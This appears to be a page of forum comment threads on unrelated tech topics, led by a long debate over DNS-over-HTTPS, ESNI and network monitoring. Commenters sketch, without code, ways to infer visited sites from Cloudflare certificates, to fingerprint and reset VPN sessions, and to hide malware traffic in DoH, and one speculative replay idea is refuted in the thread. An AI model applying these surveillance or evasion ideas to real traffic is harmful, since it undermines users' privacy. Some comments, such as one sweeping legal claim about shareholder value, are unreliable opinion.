1. -2

    Perhaps I am being fussy, but it contains lots of silly mistakes.

    Takeaway 0.1.2.1 C is a compiled programming language. No, it can also be interpreted.

    Takeaway 0.1.2.2 A correct C program is portable between different platforms. No, this is a point of view.

    Takeaway 0.2.2.1 All identifiers in a program have to be declared. No, #ifdef ABC // check whether the identifier ABC is declared

    1. 3

      Takeaway 0.1.2.1 C is a compiled programming language. No, it can also be interpreted.

      True, you can say this about a lot of “compiled languages”, but all the C code I’ve run across is compiled. Yes, the author could have been more clear.

      Takeaway 0.1.2.2 A correct C program is portable between different platforms. No, this is a point of view.

      Portability isn’t a “point of view.” Your code either (builds and) runs or doesn’t (build and) run. There’s a lot of factors involved in portability, I’m not sure you can say, “This is portable” without actually trying it on your target platforms. There’s the libraries involved, compilers/linkers for specific platforms might not implement certain things correctly, system libraries for your platforms might cause issues, the program might exceed memory capacity of some platforms but not others, etc. There are things you can do to help portability, like not use compiler-specific language extensions, which I think is the author’s intent.

      Takeaway 0.2.2.1 All identifiers in a program have to be declared. No, #ifdef ABC // check whether the identifier ABC is declared

      True. ABC is an identifier, however, your example only checks whether ABC is an identifier declared as a macro name

      1. 1

        Calling portability ‘correct’ is a point of view.

        “All identifiers” does not mean “all except macro …”

        1. 2

          Calling portability ‘correct’ is a point of view.

          I think “correct’ used here by the author with respect to the C language spec, since the following paragraph references language extensions.

          “All identifiers” does not mean “all except macro …”

          I agree with your point about identifiers. My point was that the example you provided as elaboration on your point (which is right in that ABC is considered an identifier in the #ifdef) has an incorrect comment. “// check whether the identifier ABC is declared” should be “// check whether the identifier ABC is declared as a macro name”. EDIT: Your example proves a good point! I don’t want it sullied because the comment isn’t entirely correct.

      2. 2

        I really dislike calling languages “compiled” and “interpreted”. It is only an implementation detail, and the fact that majority of implementations do one way or another doesn’t change anything. Yes, majority of C implementations do compile it, but you can also interpret it. Majority of Python implementations interpret it, but there are implementations that compile it(like Nuitka). It doesn’t matter how a language is implemented, it is not “compiled” or “interpreted” - the implementation is.

        1.  

          It’s interpreters all the way down. All compilation does is translate a program from one form to another.

          1.  

            Just nitpicking, but technically a language’s specification can make a it “compiled” or “interpreted”, which is admittedly a rare case. Also, implementations can use some hybrid of interpretation and compilation, like a runtime or virtual machine.

        1. 4

          I just realized that this is over a month old. Hope it’s still ok for everyone.

          1. 16

            I’ve been waiting for like 6 years, so this is ok

            1. 4

              I’m pretty sure that is a prepared post, as I was setting up a Mumble server a week earlier and that website was a wiki style one, and only had 1.3.0 RCs. So yeah, this should actually be a proper recent release.

              Edit: also, github release message seems relevant https://github.com/mumble-voip/mumble/releases/tag/1.3.0

              1. 3

                Version 1.3.0 is the latest stable version of Mumble and was released on September 08, 2019.

                The download link was put up fairly recently though, so it still seems good.

                1. 3

                  Ah, that makes sense. I was hearing a lot of people mentioning this release yesterday, so I was confused when I saw the date.

              1. 7

                Still waiting for someone to explain what “security” this provides. They can still see the IPs you connect to. Just look for the next SYN packet after a response comes back from a known DoH endpoint…

                The one thing this standard does is create a backdoor to make it harder for you to filter content on your network (as required by law in some situations) and makes it harder for your security team to detect bots/malware/intrusions by triggering on lookups to known malware C&C servers. TLS 1.3 plus this means it’s extremely difficult especially for critical infrastructure (e.g., power generation companies) to filter egress traffic effectively.

                If you want to stay out of prison for dissenting, you need a VPN*. If you want privacy, use a VPN*. This doesn’t solve either; it only makes it possible to avoid naughty DNS servers that modify your responses. But we already had solutions for that.

                * and make sure the VPN is trustworthy or it’s an endpoint you control.

                1. 7

                  No need to put scare-quotes on security. It hides DNS traffic. Along with eSNI it hides the domains you’re visiting. And if the domain uses a popular CDN, this makes the traffic very hard to spy on, which is a measurable improvement in privacy.

                  you need a VPN

                  Oh no, aren’t VPNs evil, because, as you said yourself, they make “it harder for you to filter content on your network (as required by law in some situations)”?

                  The false-sense-of-security traffic inspection middleboxes that were always easy to bypass with a VPN or even a SOCKS proxy, were needlessly weakening TLS for decades. Fortunately, they’re dead now.

                  1. 1

                    VPNs are much easier to block. You can do it at the protocol level for most types (you’re whitelisting outbound ports and protocols, right?) then you have lists of the public VPN providers to block as well.

                    If you’re only allowing outbound TCP 443 and a few others someone could do TCP OpenVPN over it, but performance is terrible and it’s unreliable so most people don’t try.

                    Regardless there are DPI devices which can fingerprint the OpenVPN traffic and tell it apart from HTTPS traffic because behaves differently (different send/receive patterns) and then you inject RST packets to break the session.

                  2. 4

                    Seeing IP’s that you connect to isn’t always useful, e.g. attacker wouldn’t realistically gain anything if a website you connect to is served through cloudflare, which serves enough different websites that it provides little information for the attacker.

                    1. 4

                      You can easily connect to the IP and grab the list of domains on the SAN certificate that CloudFlare is using on that IP address to figure out where they’re connecting. There’s only like 25 per certificate. It’s not hard to figure out if you are targeting someone.

                      e.g., it would not be difficult to map 104.18.43.206 to the CloudFlare endpoint of sni229201.cloudflaressl.com and once you have that IP to CloudFlare node mapping sorted out you can craft a valid request …

                      Subject Alternative Names: sni229201.cloudflaressl.com, *.carryingcoder.com, *.carscoloringpages101.com, *.caudleandballatopc.com, *.coloringpages101.com, *.cybre.space, *.emilypenley.com, *.indya101.com, *.nelight.co, *.scriptthe.net, *.shipmanbildelar.se, *.teensporn.name, *.thereaping.us, *.totallytemberton.net, *.voewoda.ru, *.whatisorgone.com, carryingcoder.com, carscoloringpages101.com, caudleandballatopc.com, coloringpages101.com, cybre.space, emilypenley.com, indya101.com, nelight.co, scriptthe.net, shipmanbildelar.se, teensporn.name, thereaping.us, totallytemberton.net, voewoda.ru, whatisorgone.com
                      
                      1. 2

                        This list is encrypted in TLS 1.3, so you can’t easily grab it anymore (Firefox and Cloudflare also support eSNI, which plugs another hole).

                        1. 1

                          You misunderstand. I would create a database mapping of all CloudFlare nodes in existence: sniXXXXXX.cloudflaressl.com <—> IP addresses.

                          When I see traffic to one of these IPs, I simply make a new TLS handshake to sniXXXXXX.cloudflaressl.com, grab the certificate, read all of the domain names in the certificate. I don’t need a plaintext SNI request to see where they’re going; I can just infer it by asking the same server myself.

                          1. 2

                            You’ll only learn that all Cloudflare customers share a handful of IP addresses, and there are millions of sites per IP.

                            The certificate bundles aren’t tied to an IP, and AFAIK even the bundles aren’t constant.

                            1. 1

                              The server publishes a public key on a well-known DNS record, which can be fetched by the client before connecting (as it already does for A, AAAA and other records). The client then replaces the SNI extension in the ClientHello with an “encrypted SNI” extension, which is none other than the original SNI extension, but encrypted using a symmetric encryption key derived using the server’s public key, as described below. The server, which owns the private key and can derive the symmetric encryption key as well, can then decrypt the extension and therefore terminate the connection (or forward it to a backend server). Since only the client, and the server it’s connecting to, can derive the encryption key, the encrypted SNI cannot be decrypted and accessed by third parties.

                              That’s fine, then someone will just excise the encrypted SNI part to use it in a crafted packet that’s almost like a replay attack. That will still get you the list of 25ish domains they could have accessed.

                              Hell, this looks like you could eventually build a rainbowtables out of your captured SNI packets once you have sorted through the available metadata to see where they user went. (Assuming CF doesn’t rotate these keys regularly) Just analyze all sites on that cert, see all the 3rd party domains you need to load, and you can figure it out.

                              This is a small hurdle for a state actor

                              edit: I’m pretty sure you can just do a replay of the SYN to CloudFlare and not worry about trying to rip out the SNI part to get the correct certificate (TCP Fast Open)

                              edit2:

                              7.5.1.  Mitigate against replay attacks
                              
                                 Since the SNI encryption key is derived from a (EC)DH operation
                                 between the client's ephemeral and server's semi-static ESNI key, the
                                 ESNI encryption is bound to the Client Hello.  It is not possible for
                                 an attacker to "cut and paste" the ESNI value in a different Client
                                 Hello, with a different ephemeral key share, as the terminating
                                 server will fail to decrypt and verify the ESNI value.
                              

                              Yeah you can’t replay the ESNI value, but if you replay the entire Client Hello I think it should work. The server won’t know the client’s “ephemeral” ESNI key was re-used.

                              https://datatracker.ietf.org/doc/draft-ietf-tls-esni/?include_text=1

                              1. 4

                                The client Hello ideally only contains a client’s public key material, so you can’t decrypt the ESNI even if you replay the client hello. Unless you use a symmetric DH operation (which is rare and not included in TLS1.3) or break ECDH/EdDH/ECDHE.

                                1. 2

                                  You are correct. I was going to post this after some coffee this morning. The response is encrypted with the client’s ephemeral ECDHE key.

                                  So this breaks this type of inspection.

                                  However, if you’re connecting to an endpoint that’s not on a CDN and is unique the observer can still figure out where you’re going. Is the solution we’re going to be promoting over the next few years to increase reliance on these CDN providers? I really don’t like what CloudFlare has become for many reasons, including the well known fact that nothing is free. They might have started with intentions of making a better web but wait until their IPO. Once they go public, all bets are off. All your data will be harvested and monetized. Privacy will ostensibly be gone.

                                  In America it’s illegal to make ethical choices if it doesn’t maximize shareholder value. (Ebay v Newmark, 2010)

                      2. 3

                        yes, and that protects exactly.. no one who needs it.

                        if you live somewhere where you need the security to hide your DNS requests, cloudflare will be the first thing to get blocked. the only really secure thing to do is onion routing of the whole traffic. centralizing the internet makes it more brittle.

                        additionally: ease of use is no argument if it means trading-off security. these tradeoffs put people in danger.

                        1. 3

                          As someone who barely knows his TCPs from his UDPs, I had to read up on DoH, and I must say that a technology must be doing something right if it elicits both your reaction and the following from the Wikipedia article:

                          The Internet Watch Foundation and the Internet Service Providers Association (ISPA)—a trade association representing UK ISPs, criticised Google and Mozilla for supporting DoH, as they believe that it will undermine web blocking programs in the country, including ISP default filtering of adult content, and mandatory court-ordered filtering of copyright violations.

                          1. 3

                            i think DoH is the wrong solution for this problem, stuffing name resolution into an unrelated protocol. it may be true that it has the side-effect of removing the ISP-DNS-filters, but those can already be circumvented by using another name server.

                            a better solution would be to have a better UI to change the nameservers, possibly in connection with DNS over TLS, which isn’t perfect, but at least it isn’t a mixture of protocols which DoH is.

                            it could be an argument that the ISP could block port 53, and DoH would fix that. then we have another problem, namely that the internet connection isn’t worth it’s name. the problem with these “solutions” is that they will become the norm, and then the norm will be to have a blocked port 53. it’s a bit like the broken window theory, only with piling complexity and bad solutions.

                            maybe that’s my problem with it: DoH feels like a weird kludge like IP-over-ICMP or IP-over-DNS to use a paid wifi without paying.

                            1. 2

                              maybe that’s my problem with it: DoH feels like a weird kludge like IP-over-ICMP or IP-over-DNS to use a paid wifi without paying.

                              I agree with you that it feels like a kludge, it feels icky to me too.

                              But it’s something that could lead to a better internet - at the moment DNS traffic is both unencrypted, but more importantly, unauthenticated. If a solution can be found that improves this, even if it’s a horrible hack, I think it’s a net win.

                              Internet networking, like politics, is the art of the possible. We can all dream of a perfect world not beholden to vast corporate interests at every level of the protocol stack, but in the meantime the best we can hope for is to leverage some vast corporate interests against others.

                              1. 2

                                But it’s something that could lead to a better internet - at the moment DNS traffic is both unencrypted, but more importantly, unauthenticated. If a solution can be found that improves this, even if it’s a horrible hack, I think it’s a net win.

                                It may be a short term win, but in the end we are stuck forever with another bad protocol because nobody took the time and effort to build a better one, or just had an agenda.

                                Internet networking, like politics, is the art of the possible. We can all dream of a perfect world not beholden to vast corporate interests at every level of the protocol stack, but in the meantime the best we can hope for is to leverage some vast corporate interests against others.

                                DoH is just another way of centralizing the net. sure you can set another resolver in the settings, but for how long? you’d have to do that on every device. or use the syncing functionality which is.. centralized. and even, who does that?

                                i don’t think that “big players” in politics or in tech, do things out of altruistic reasoning, but, in the best case, good old dollar. that paired with most of the things being awful hacks (again in both, politics and tech) paints a bright future.

                                1. 2

                                  I mean, the reality we live in now, where a company like Cloudflare has a de-facto veto on Internet content, just grew organically. It’s an inevitable consequence of technical progress, as stuff (like hosting, and DDoS protection) gets commoditized efficiencies of scale make large companies are the only ones who have a hope of making a profit.

                                  To their credit, Cloudflare seem aware and uncomfortable about their role in all this, but that’s scant consolation as they’re under the same profitability requirements as the rest of the free world. They can be sold, or move to “evil” to save their profits.

                                  1. 3

                                    Yep - even prior to DoH, Cloudflare have BGP announce privileges and can issue certificates which are trusted by browsers, which are two powers which should never have been combined in the same entity (being able to funnel a sites traffic to your servers and also generate valid certs for those requests).

                                    1. 2

                                      I mean, the reality we live in now, where a company like Cloudflare has a de-facto veto on Internet content, just grew organically.

                                      … and with their resolver being the default one they even have control over the rest, amazing!

                                      It’s an inevitable consequence of technical progress, as stuff (like hosting, and DDoS protection) gets commoditized efficiencies of scale make large companies are the only ones who have a hope of making a profit.

                                      the need for something like DDoS protection is more a consequence of full-throttle capitalism ;)

                                      1. 1

                                        with their resolver being the default one

                                        For the fraction of internet users running Firefox, sure. Google will handle the rest. No doubt MSFT will hop on board too.

                                        the need for something like DDoS protection is more a consequence of full-throttle capitalism

                                        Or technical debt inherited from a more trusting vision of the internet…

                                        (edit addressed Cloudflare’s role as default DoH provider for Firefox)

                              2. 2

                                UK ISPs have to block child porn or the CEO will be held accountable and go to prison. They do DNS filtering, because IP filtering is impossible. Now they can’t even do that.

                                1. 5

                                  I’m aware of the legal requirements of UK ISPs (although why they feel they need to celebrate this requirement by awarding (then withdrawing) the “Internet Villain of the Year” to Mozilla is beyond me).

                                  I guess the “responsibility” for filtering/blocking will move up to Cloudflare.

                                  1. 1

                                    we’ve had a lengthy political discussion in germany about this topic (where “filtering” was a long time the preferred political solution) now the policy is to ask the respective hoster to delete these things. i have no good english source for this, so here is the translated german wikipedia article (original)

                                    1. 3

                                      You can push the ISP to DNS block it (though it’s harder and usually leads to years-long court cases as in Vodafone’s case).

                                      Telekom also loves to push their own search engine with advertisements for NXDOMAIN responses.

                            2. 3

                              Still waiting for someone to explain what “security” this provides. They can still see the IPs you connect to. Just look for the next SYN packet after a response comes back from a known DoH endpoint…

                              It does one useful thing: It prevents them from MITMing these packets and changing them.

                              I’d like encrypted DNS, but I’m very strongly against Firefox selecting my DNS resolver for me for reasons that have already been stated in threads here. I also strongly prefer keeping the web stack out of my relatively simple client-side DNS resolver. Diverse ecosystems are important, and the only way to maintain them is to keep software simple enough that it is cheap to implement.

                              1. 1

                                It does one useful thing: It prevents them from MITMing these packets and changing them.

                                Sure, but that’s rare. It would require a targeted attack or a naughty ISP to be altering results.

                                What it most certainly does is prevent me from forcing clients to use my on-premises DNS resolver. Now you have zero controls over the client devices on your network when it comes to DNS and additionally we’re about to lose HTTPS inspection in the near future. This is the wrong approach to solve the problem. Admins need controls and visibility to secure their networks.

                                Mark my words, as soon as this is supported by a few different language libraries you’ll see malware and all sorts of evil things using it to hide exfiltration and C&C because it will be hidden in the noise of normal user traffic.

                                It will be almost impossible now to stop users or bad guys from accessing Dropbox, for example. “Secure the endpoints” is not the answer. You can secure them, deny BYOD, etc, but you have to assume they’re compromised and/or rooted. Only the network is your source of truth about what’s really happening and now we’re losing that.

                                1. 4

                                  I guess I don’t have much sympathy for the argument that network administrators will lose insight into the traffic on their networks. That seems like a bonus to me, despite the frustration for blue teams.

                                  1. 3

                                    Same. I understand that in some places there are legal auditing requirements, but practically everywhere else it’s just reflexive hostility towards workers that makes us use networks that are pervasively censored and surveilled.

                                  2. 4

                                    Sure, but that’s rare. It would require a targeted attack or a naughty ISP to be altering results.

                                    Except that it’s not rare. You will find this in many hotel wifis. This hits you particularly hard if you have a DNSSEC validating resolver, which doesn’t take kindly to these manipulations. Having a trusted recursor is generally important if your want to be sure that you talk to a resolver you can actually trust, which is in turn important if you want to delegate validation.

                                    What it most certainly does is prevent me from forcing clients to use my on-premises DNS resolver.

                                    Just as HTTPS prevents you from forcing your clients to talk to an on-remise cache or whatever. The solution is the same in both cases. You need to intercept TLS, if this is a hard requirement for you. DoH and DoT isn’t making anything more complicated, its just bringing DNS on par with the protection level we have had for other protocols for a while.

                                    1. 3

                                      You hit the nail on the head here. Far from being rare, in the US it’s ubiquitous, whether it’s your hotel, your employer, or your residential ISP.

                                    2. 3

                                      Only the network is your source of truth about what’s really happening and now we’re losing that.

                                      Good. Corporate networks must die. “Secure the endpoints” is THE ONLY answer.

                                      https://beyondcorp.com

                                      If Google can pull it off at Google scale, so can you. Small teams with lots of remote people have always been Just Using The Internet with authentication. It’s the “Enterprise”™ sector that’s been suckered into buying “Security Products”™ (more like “Spying Products”) to keep trying to use this outdated model.

                                      1. -1

                                        You clearly know nothing about running critical infrastructure networks, so please refrain from making these types of comments.

                                      2. 2

                                        What it most certainly does is prevent me from forcing clients to use my on-premises DNS resolver.

                                        Could you please elaborate? Is this about a “non-canonical” local resolver or do you think it also has repercussions for locally hosted zones? For example *.internal.example.org locally versus *.example.org on the official internet. Or did I misunderstand you and you just meant a local forwarding resolver?

                                        I honestly didn’t read up enough on DoH yet, just wondering.

                                        1. 1

                                          Mark my words, as soon as this is supported by a few different language libraries you’ll see malware and all sorts of evil things using it to hide exfiltration and C&C because it will be hidden in the noise of normal user traffic.

                                          Setup your own DoH server and you can once again inspect it. Ideally you use a capable and modern TLS intercepting box to inspect all traffic going in and out (as well as caching it).

                                          1. 1

                                            Mark my words, as soon as this is supported by a few different language libraries you’ll see malware and all sorts of evil things using it to hide exfiltration and C&C because it will be hidden in the noise of normal user traffic.

                                            How? The IP or the URL of the DoH server you are talking to will stand out like a signal flare… I think that dumping the file to a cloud-service is way more efficient, easier and effective.

                                            1. 1

                                              The US Gov often gives early reports to security teams of Critical Infrastructure networks details on all sorts of potential attacks, including early heads up on malware that may or may not be targeted. This includes a list of C&C domains that may be accessed. If the software can hide its DNS requests by making it look like normal HTTPS traffic to CloudFlare, that makes it even harder to identify the malware’s existence on your network.

                                              If you want the Russians or Chinese to hack our grid, this is a great tool for them along with TLS 1.3. The power generation utility that I worked at did HTTPS interception and logging of ALL HTTPS and DNS requests from every device everywhere for analysis (and there was a program coming online to stream it to the government for early detection) and now this is becoming impossible.

                                              1. 1

                                                This pertains only to firefox… So why would an installation of firefox be on one of those networks?

                                                Furthermore: You know the ip of cloudflare’s DoH server. You could just block that and be done with it right? If the malware uses some other server, that will show up as well.

                                                1. 2

                                                  Firefox won’t be on that network, but HTTPS certainly will be. Likely not on (hopefully still airgapped) SCADA, but on other sensitive networks that give some level of access into SCADA through various means.

                                                  The point is that as DoH thrives and becomes commonplace and someone like CloudFlare runs this service, it’s easy to hide DNS requests mixed in with normal looking HTTPS traffic. The client can be a python script with DoH capability.

                                                  As for CloudFlare’s DoH service – it appears to be running on separate IPs at the moment, but there’s no reason why they couldn’t put this on their normal endpoints. DoH is HTTPS, so why not share it with their normal CDN endpoints? This would not be difficult to do in Nginx. In fact this would be far simpler than running HTTPS and SSH on the same port, which is also possible.

                                                  Basically any normal-looking HTTPS endpoint could become a DoH provider. Hack some inconspicuous server, reconfigure their webserver to accept DoH too, and now you’ve got the backdoor you need for your malware.

                                                  CloudFlare and Firefox are not my concern; DoH as a whole is.

                                                  1. 1

                                                    As for CloudFlare’s DoH service – it appears to be running on separate IPs at the moment, but there’s no reason why they couldn’t put this on their normal endpoints. DoH is HTTPS, so why not share it with their normal CDN endpoints? This would not be difficult to do in Nginx. In fact this would be far simpler than running HTTPS and SSH on the same port, which is also possible.

                                                    Fair point…

                                                    But now I’m wondering why you would have access to cloudflare on such a network… Or why there won’t be a root-certificate on all the machines (and firefoxes) in the network so that the organization can MITM’s all outgoing traffic?

                                                    1. 1

                                                      There are going to be some networks running servers that need outbound HTTPS for various reasons, but a lot of that can be locked down. But what about the network that the sysadmins are on? They need full outbound HTTPS, and a collaborating piece of malware on one of their machines gives them access to the internet and to other internal sensitive networks. These types of attacks are always complex and targeted. Think of the incredible work we did with Stuxnet.

                                                      As for MITM the traffic… look at this thread where it’s being discussed further https://lobste.rs/s/pechdy/turn_off_doh_firefox_now#c_inbnse

                                                      1. 1

                                                        There are going to be some networks running servers that need outbound HTTPS for various reasons, but a lot of that can be locked down.

                                                        So why cloudflare? I doubt you’d need any high-volume sites that use cloudflare for those setups.

                                                        But what about the network that the sysadmins are on? They need full outbound HTTPS, and a collaborating piece of malware on one of their machines gives them access to the internet and to other internal sensitive networks. These types of attacks are always complex and targeted. Think of the incredible work we did with Stuxnet.

                                                        If the networks really are that sensitive, just separate them physically, give the sysadmins two machines and never transport data in digital form from the one to the other….

                                                        If you are not willing to take these kinds of steps, your internal networks simply aren’t that critical.

                                                        1. 2

                                                          That is not how the networks at our power utilities work. And it’s not how the employees operate either.

                                                          1. Many power companies refuse to implement new technologies or network topologies unless another utility does it first. Which sadly means that in certain regions like MISO you can expect most of the utilities to be using the same firewalls, etc etc. Very dumb. Can’t wait for Russia to abuse this and take down half the country.

                                                          2. The people that work there aren’t the brightest. “Why are user accounts being managed with a perl script that overwrites /etc/passwd, /etc/shadow, and /etc/groups?” Well because that’s the way they’ve always done it, so if your team needs to install a webserver you also need to tell them to add the www user to their database so the user account doesn’t get removed. “Why are the admins ssh-ing as root everywhere with a DSA key that has no passphrase protection?” because the admins (of 20 years experience) refuse to learn ssh-agent and use basic security practices. I had meetings with developers who needed their application to be accessible across security domains and the developer couldn’t tell me what TCP port their application used. “What’s a port?”. These are people making 6 figures and doing about 30 minutes of work a day. It’s crazy.

                                                          3. These are highly regulated companies with slim margins. You want these kinds of drastic changes to their infrastructure? You better start convincing people to nationalize the grid because they don’t have the money to do it. Remember, it takes about 3 years to get a utility rate change approved. It’s a long process of auditing and paperwork and more auditing and paperwork to prove to the government that they really do need to increase utility rates to be able to afford X Y and Z in the future. They’re slow moving. Very slow.

                                                          4. Do you think customers will want their power bills to go up just so they can hire competent IT staff? Not a chance. (What we really need to do is stop subsidizing bulk power customers and making normal residential customers pay more than their fair share, but that’s a different discussion)

                                                          tl;dr we can all wish hope and pray that companies around the world will do the right thing, but it’s not going to happen anytime soon, especially in Critical Infrastructure environments because they’re so entrenched in their old ways and don’t have the budgets to do it the right way regardless.

                                                          1. 1
                                                            1. In utility companies, the production networks running the power plants should simply not come into contact with the internet. There should always be a human inbetween the network and the internet. If this is not the case, they deserve what’s coming.

                                                            2. Believe it or not. I can actually understand why they dump into /etc/groups, /etc/passwd and /etc/shadow. There is no chance of any machine having an outdated users by accident or by partial configuration this way, and if your network has only a few hundreds of users, which are all more or less trained to deal with complex technological systems on a basic level. Why not? It’s not like they are running a regular common office workplace.

                                                            However, what you are telling me about SSH and TCP is quite shocking. That is just plain incompetence.

                                                            1. I’m not living in the US. In fact; the last time I’ve been there I was at an age from which I can barely remember anything other than that the twin towers still stood. I am often told that it’s a different country now, so I can’t say anything useful about this.

                                                            2. Depends…. If the outages are below about 2 short power outages per year on average, then no I wouldn’t.

                                                            If it starts to escalate to one outage per month and 25% of them can be blamed on incompetent IT-staff? You’ve reached the point where I am going to install my own diesel generators as those will quickly become profitable.

                                                2. 1

                                                  I don’t quite understand. Regardless of the TLS version, if you want to inspect https you need to intercept and decrypt outgoing https traffic via a middlebox. This applies to regular https just as it applies to DoH. If you are required to secure your network inspecting encrypted traffic, you will continue to do so just like you’ve always done. In this sense, DoH is even less intrusive than, say, DoT because your standard https intercept proxy can be adapted to deal with it.

                                                  1. 1

                                                    Wasn’t the goal of TLS 1.3 to make interception impossible? I am certain that was one of the major goals, but I didn’t follow through the RFC’s development.

                                                    How would interception work? With ESNI in TLS 1.3, the client does a DNS lookup to retrieve the key to encrypt the ESNI request with. The middlebox couldn’t decrypt the ESNI and generate a certificate by the local trusted CA because it doesn’t know the hostname the client wants to access. So now… a middlebox will also have to be a DNS server so it can capture the lookup for the ESNI key, generate a fake key on demand, and have it ready when the TLS connection comes through and is intercepted?

                                                    This is getting quite complex, and there may be additional middlebox defeat features I’m not aware of

                                                    1. 1

                                                      No, the basic handshake can still be intercepted similarly to TLS 1.2, so that’s not a problem with 1.3.

                                                      ESNI might be a slightly different issue. But you could just take a hardline stance and drop TLS handshakes which use ESNI and filter the ESNI-records (with a REFUSED error?) in your resolver. If you need to enforce TLS intercept, you will need to enforce interceptability of that traffic and that might mean refusing TLS handshakes which use ESNI. But I heaven’t read the RFC drafts yet, so there might be easier/better ways to achieve this. In any case, none of this should be a deal breaker. TLS intercept proxies have always been disruptive (e.g. client certificates cannot be forwarded past an intercept proxy) and this will apply to ESNI just as it has done to past aspects of TLS.

                                                      What I feel should be clear is that none if this will suddenly turn existing practices impossible. Restrictive environments will continue to be able to be restrictive, just as they have in the past. The major difference will hopefully be that we will be safer by default even in open networks, such as public wifis, where a large number of users are currently exposed to unnecessary risks.

                                                      1. 1

                                                        ESNI might be a slightly different issue. But you could just take a hardline stance and drop TLS handshakes which use ESNI and filter the ESNI-records (with a REFUSED error?) in your resolver. If you need to enforce TLS intercept, you will need to enforce interceptability of that traffic and that might mean refusing TLS handshakes which use ESNI.

                                                        I don’t think this is possible. TLS 1.3 means ESNI is a given. If half the internet uses TLS 1.3-only, you have no choice but to support it. AIUI they’ve gone to great lengths to prevent downgrade attacks which will stop the interception.

                                                        I have a contact at BlueCoat and am reaching out to see what the current state is because their speciality is exactly this.

                                                        1. 1

                                                          TLS 1.3 means ESNI is a given.

                                                          Right now, ESNI is not mandatory for TLS 1.3. TLS 1.3 is a complete and published RFC standard. ESNI is only a draft and is certainly not mandated by TLS 1.3. You don’t need to run downgrade attacks to “intercept” TLS 1.3. Intercept proxies simply complete the TLS handshake by returning a certificate for a given domain issued by a custom CA that’s (hopefully) in the client’s trust store. This works just the same for 1.3 as it does for any earlier method.

                                                          1. 1

                                                            Do we know the failure mode is if ESNI is rejected? Everyone wants ESNI for their privacy and browsers will certainly implement it, so it will be more common than not I suspect.

                                                            edit: and thanks, I was still operating under the impression that ESNI was part of the final TLS 1.3 draft. I haven’t taken the time to read through it all and there’s a lot of misinformation out there. I’ve been too busy to dig in deeper, and security is not my day job right now.

                                        1. 7

                                          Probably the introduction should instead be submitted https://www.caniemail.com/news/2019-09-09-introducing-caniemail/

                                          1. 7

                                            Because it is your computer that runs the code, you can use a lot of different techniques. But that also may cause a problem, because you can use any algorithm if it fits in the timeout given. This means that if you have the hardware for it, you could train a neural net with 1M parameters and run it against others. You would probably win, but at a cost. Basically, I think that this could create a pay-to-win problem.

                                            1. 4

                                              I personally support anyone wanting to solve this game using machine learning, because that’s an interesting problem in itself, as long as they keep it from impeding/discouraging beginners :-)

                                              They have multiple divisions in the tournament (Beginner, Intermediate, Advanced). While that is not a perfect solution, because you can’t enforce it, in practice I think anyone training a neural net would take that to the Advanced division where it’s fair game and go for the gold. The Battlesnake community is full of friendlies and I doubt anyone would take that level of bot into the beginner’s division, which would just be blatantly unfair, and not really worth the Beginner prize in a tournament anyway. In Advanced, there’s still going to be a cut-off point where the cost of your hardware grows past the potential of winning a prize, and even then, there’s enough random chance in the game that it’s not a guaranteed win.

                                              1. 3

                                                If this ever became a legitimate problem, you could say “You must run your code on a Raspberry Pi” or “Your code will be run in a docker container with certain resource limits set”.

                                                1. 2

                                                  The problem is that then you cannot enforce such requirements using what they have now, and moving to Docker containers could open remote code execution problems, which are hard to deal with, because sandboxing is hard. There is no universal solution. CodeCombat solution is to have their own language subsets, which they then can control how are executed. Obviously, the techniques are then limited.

                                                  1. 2

                                                    The engine is open source and you can easily run it on your own network. So if you want to, you can host your own event where everyone brings a Raspberry Pi to run on.

                                                  2. 2

                                                    This seems like complaining that surfing is pay-to-win because some surfers can buy better boards. It’s not strictly incorrect, but it appears to be a great distance away from the point of surfing.

                                                  1. 13

                                                    He’s also overlooking one factor: this kind of art may attract users exactly because it’s ugly. To me it’s a form of signaling. What I read is: we don’t care about the big audience, we care about our niche and you might be in this niche. If you do, you will enjoy this game more than most of the mainstream stuff out there. Nowadays most of the indie developers target very broad audiences and they are as uninteresting as the mainstream, rehashing over and over always the same 3 concepts and stories. When I see ugly ass games I know that there I might find something worth my time.

                                                    I’m into strategy games and management games, not really RPG. Dwarf Fortress, Slitherine, Illwinter, they are all ugly as shit but you can dump hundreds of hours into them and be sure to find an amount of content that in a AAA game could never be produced, because scaling art is much much harder than scaling gaming systems.

                                                    Dominions couldn’t exist in any other form. Just imagine a planning meeting:

                                                    • Ok, for Dominions 5 we will have to hire 3D modelers and animators to make every unit animated. Now, how many distinct units do we have in the game?
                                                    • Some hundreds
                                                    • Yes, but exactly?
                                                    • I don’t know, we stopped counting after Dominions 2, they are just too many.

                                                    This kind of art to me signals that they are not bounded by the limits of visual representation and can create more freely and it should then be regarded as a selling point.

                                                    1. 9

                                                      Actually I think Vogel’s games look great. I also think Illwinter’s games look great. I feel like the modern 3d graphics style is just a trend like Ruffs in the 1500’s. People look at anything without it now and go “aargh, my eyes!” but in the future it may be the other way around.

                                                      Other than that I agree 100%. Imagine Illwinter telling their fans “Hey we are removing 18/20 races and 90% of the units for the remaining races. Then we are spending our entire budget on making high-poly animated 3d models for what is left”.

                                                      They would get death threats.

                                                      They would also be ruining a great game. I wish more studios that have a real budget would spend it on gameplay and depth of content.

                                                      1. 6

                                                        Dwarf Fortress, Slitherine, Illwinter, they are all ugly as shit

                                                        They are all ugly as shit in the same way. They are consistent in their ugliness. Dwarf fortress uses ASCII everywhere - there is zero mixing between ASCII and non ASCII, and the style of ASCII is the same - one character is one thing. The same with other games - the color palette and style are consistent - however ugly they are. In Dominions 5 every unit is 2D - there is no mixing.

                                                        Inconsistency is the worst thing about Jeff’s style. It is arguably one of the easiest things to achieve and as screenshots is the thing that I’m likely to see the most while I’m choosing whether to buy it or not. And being inconsistent in style for me says that the game could very well be inconsistent in other aspects too.

                                                      1. 4

                                                        I don’t have an account on Zulip nor on IRC. What is “!qefs” problem, as no search engine reveals it?

                                                        1. 8

                                                          "$Quote" "$Every" "$Fucking" "$Substitution"

                                                          1. 1

                                                            FWIW Googling “qefs bash” shows a bunch of references. I thought it was funny the first time I saw it … If I think back to 15 years ago when I first wrote bash, I think a code reviewer told me the same thing, haha.

                                                          1. 16

                                                            No need for my Atlassian account anymore…

                                                            1. 15

                                                              Agree. The only reason I had a BitBucket account was my mercurial repositories.

                                                              If only Atlassian could sunset JIRA. That would be nice…

                                                              1. 12

                                                                If only Atlassian could sunset JIRA. That would be nice…

